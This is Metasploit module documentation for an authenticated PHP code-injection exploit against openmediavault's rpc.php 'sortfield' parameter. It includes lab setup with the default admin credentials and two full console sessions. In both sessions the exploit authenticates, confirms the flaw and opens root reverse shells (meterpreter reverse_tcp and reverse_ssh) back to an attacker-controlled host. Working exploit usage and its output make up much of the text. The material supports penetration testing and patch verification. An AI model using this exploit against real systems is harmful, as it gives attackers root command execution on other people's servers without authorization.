## Vulnerable Application

### Description

  This module exploits an authenticated PHP code injection
  vulnerability found in openmediavault versions before 4.1.36
  and 5.x versions before 5.5.12 inclusive in the `sortfield`
  POST parameter of the `rpc.php` page, because `json_encode_safe()`
  is not used in `config/databasebackend.inc`.
  Successful exploitation grants attackers the ability to execute
  arbitrary commands on the underlying operating system as root.


### Installation And Setup

  1. Download version 5.5.11 of OpenMediaVault (i.e. [openmediavault_5.5.11-amd64.iso ISO](https://deac-ams.dl.sourceforge.net/project/openmediavault/5.5.11/openmediavault_5.5.11-amd64.iso)).
  2. Set up a new Debian machine in VirtualBox or VMWare and load the ISO.
  Follow the install prompts and note the `root` password you choose to use.
  Once the installation is finished, press `<Enter>` to reboot the server.
  3. Log into via the terminal using the username `root` and the password
  you set for the `root` user during installation.
  4. On the shell and run the command `ip a` to get the current IP address.
  5. Take the IP address and browse to the URL http://*IP ADDRESS*/, then log in
  with the default administrative credentials (`admin`:`openmediavault`).

## Options

### TARGETURI

  The URI path for OpenMediaVault installation

### USERNAME

  The username for OpenMediaVault

### PASSWORD

  The password for OpenMediaVault

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).

## Scenarios

### OpenMediaVault 5.5.11 With Linux Dropper Payload
```
msf > use exploit/unix/webapp/openmediavault_rpc_rce
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf exploit(unix/webapp/openmediavault_rpc_rce) > set RHOSTS 172.29.90.121
RHOSTS => 172.29.90.121
msf exploit(unix/webapp/openmediavault_rpc_rce) > set LHOST 172.29.95.98
LHOST => 172.29.95.98
msf exploit(unix/webapp/openmediavault_rpc_rce) > exploit

[*] Started reverse TCP handler on 172.29.95.98:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] 172.29.90.121:80 - Authenticating with OpenMediaVault using admin:openmediavault...
[+] 172.29.90.121:80 - Successfully authenticated with OpenMediaVault using admin:openmediavault.
[*] 172.29.90.121:80 - Trying to detect if target is running a supported version of OpenMediaVault.
[+] 172.29.90.121:80 - Identified OpenMediaVault version 5.5.11.
[*] 172.29.90.121:80 - Verifying remote code execution by attempting to execute 'usleep()'.
[+] 172.29.90.121:80 - Response received after 9 seconds.
[+] The target is vulnerable.
[*] 172.29.90.121:80 - Sending payload (150 bytes)...
[*] Sending stage (976712 bytes) to 172.29.90.121
[*] Meterpreter session 1 opened (172.29.95.98:4444 -> 172.29.90.121:59890) at 2020-11-09 11:26:22 -0600
[*] Command Stager progress - 100.00% done (799/799 bytes)

meterpreter > sysinfo
Computer     : openmediavault.local
OS           : Debian 10.5 (Linux 5.7.0-0.bpo.2-amd64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > getuid
Server username: root @ openmediavault (uid=0, gid=0, euid=0, egid=0)
meterpreter > getwd
/
meterpreter > shell
Process 930 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux openmediavault 5.7.0-0.bpo.2-amd64 #1 SMP Debian 5.7.10-1~bpo10+1 (2020-07-30) x86_64 GNU/Linux
exit
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.29.90.121 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(unix/webapp/openmediavault_rpc_rce) >
```

### OpenMediaVault 5.5.11 With Unix In-Memory Payload
```
msf > use exploit/unix/webapp/openmediavault_rpc_rce
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf exploit(unix/webapp/openmediavault_rpc_rce) > set RHOSTS 172.29.90.121
RHOSTS => 172.29.90.121
msf exploit(unix/webapp/openmediavault_rpc_rce) > set LHOST 172.29.95.98
LHOST => 172.29.95.98
msf exploit(unix/webapp/openmediavault_rpc_rce) > set TARGET 1
TARGET => 1
msf exploit(unix/webapp/openmediavault_rpc_rce) > show options

Module options (exploit/unix/webapp/openmediavault_rpc_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   openmediavault   yes       The OpenMediaVault password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.29.90.121    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The URI path of the OpenMediaVault installation
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   admin            yes       The OpenMediaVault username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_ssh):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.29.95.98     yes       The listen address (an interface may be specified)
   LPORT  22               yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Automatic (Unix In-Memory)


msf exploit(unix/webapp/openmediavault_rpc_rce) > set LPORT 9988
LPORT => 9988
msf exploit(unix/webapp/openmediavault_rpc_rce) > run

[*] Started SSH reverse handler on ssh://172.29.95.98:9988
[*] Executing automatic check (disable AutoCheck to override)
[*] 172.29.90.121:80 - Authenticating with OpenMediaVault using admin:openmediavault...
[+] 172.29.90.121:80 - Successfully authenticated with OpenMediaVault using admin:openmediavault.
[*] 172.29.90.121:80 - Trying to detect if target is running a supported version of OpenMediaVault.
[+] 172.29.90.121:80 - Identified OpenMediaVault version 5.5.11.
[*] 172.29.90.121:80 - Verifying remote code execution by attempting to execute 'usleep()'.
[+] 172.29.90.121:80 - Response received after 6 seconds.
[+] The target is vulnerable.
[*] 172.29.90.121:80 - Sending payload (158 bytes)...
[*] SSH command shell session 2 opened (127.0.0.1 -> 127.0.0.1) at 2020-11-09 11:28:39 -0600

id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
uname -a
Linux openmediavault 5.7.0-0.bpo.2-amd64 #1 SMP Debian 5.7.10-1~bpo10+1 (2020-07-30) x86_64 GNU/Linux
pwd
/
```
